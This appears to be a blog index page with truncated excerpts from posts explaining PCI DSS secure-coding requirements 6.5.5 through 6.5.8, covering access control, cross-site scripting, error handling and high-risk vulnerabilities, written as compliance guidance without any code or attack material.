PCI Requirement 6.5.8 – Improper Access Control

by Randy Bartels / February 7, 2023

What is Improper Access Control? PCI Requirement 6.5.8 states that your organization’s applications are protected from improper access control, such as insecure direct object references, failure to restrict URL access, directory traversal, and failure to restrict user access to functions. PCI Requirement 6.5.8 applies to all of your organization’s web applications, internal application interfaces, and external application interfaces. Web applications, the PCI DSS states, have unique security risks as well…

PCI Requirement 6.5.7 – Cross-Site Scripting (XSS)

by Randy Bartels / February 7, 2023

What is Cross-Site Scripting? Cross-site scripting (XSS) is another type of common coding vulnerability associated with application development. PCI Requirement 6.5.7 requires that you protect all of your organization’s web applications, internal application interfaces, and external application interfaces from XSS. Web applications, the PCI DSS states, have unique security risks as well as relative ease and occurrence of compromise. How does an XSS attack work? XSS is a type of…

business people walking

PCI Requirement 6.5.1 – 6.5.6 Recap

by Randy Bartels / February 7, 2023

Where Do PCI Requirements 6.5.1 - 6.5.6 Apply? We’ve looked at PCI Requirement 6.5.1 through 6.5.6 together and learned about protection from injection flaws, buffer overflows, insecure cryptographic storage, insecure communications, improper error handling, and “high risk” vulnerabilities. But, where does PCI Requirement 6.5.1 through 6.5.6 apply? It’s important to know that PCI Requirements 6.5.1 through 6.5.6 apply to all internal and external applications. PCI Requirements 6.5.1 - 6.5.6 Recap…

PCI Requirement 6.5.5 – Improper Error Handling

by Randy Bartels / February 7, 2023

What is Improper Error Handling? Improper error handling is one of the common coding vulnerabilities outlined in PCI Requirement 6.5. PCI Requirement 6.5.5 states that improper error handling must be addressed in your coding techniques. PCI Requirement 6.5.5 alerts organizations that improper error handling introduces many security issues to your website because it can unintentionally leak information to an end-user or malicious individual. For example, a 500 Internal Sever Error…

PCI Requirement 6.5.6 – All “High Risk” Vulnerabilities

by Randy Bartels / February 7, 2023

What are “High Risk” Vulnerabilities? PCI Requirement 6.1 taught us how to establish a process for identifying security vulnerabilities. The PCI DSS explained that risk ranking allows organizations to identify, prioritize, and address the highest risk items and reduce the likelihood that vulnerabilities will be exploited. Risk ranking is a vital element of PCI Requirement 6.5.6, which states that organizations must have a process in place to determine how to…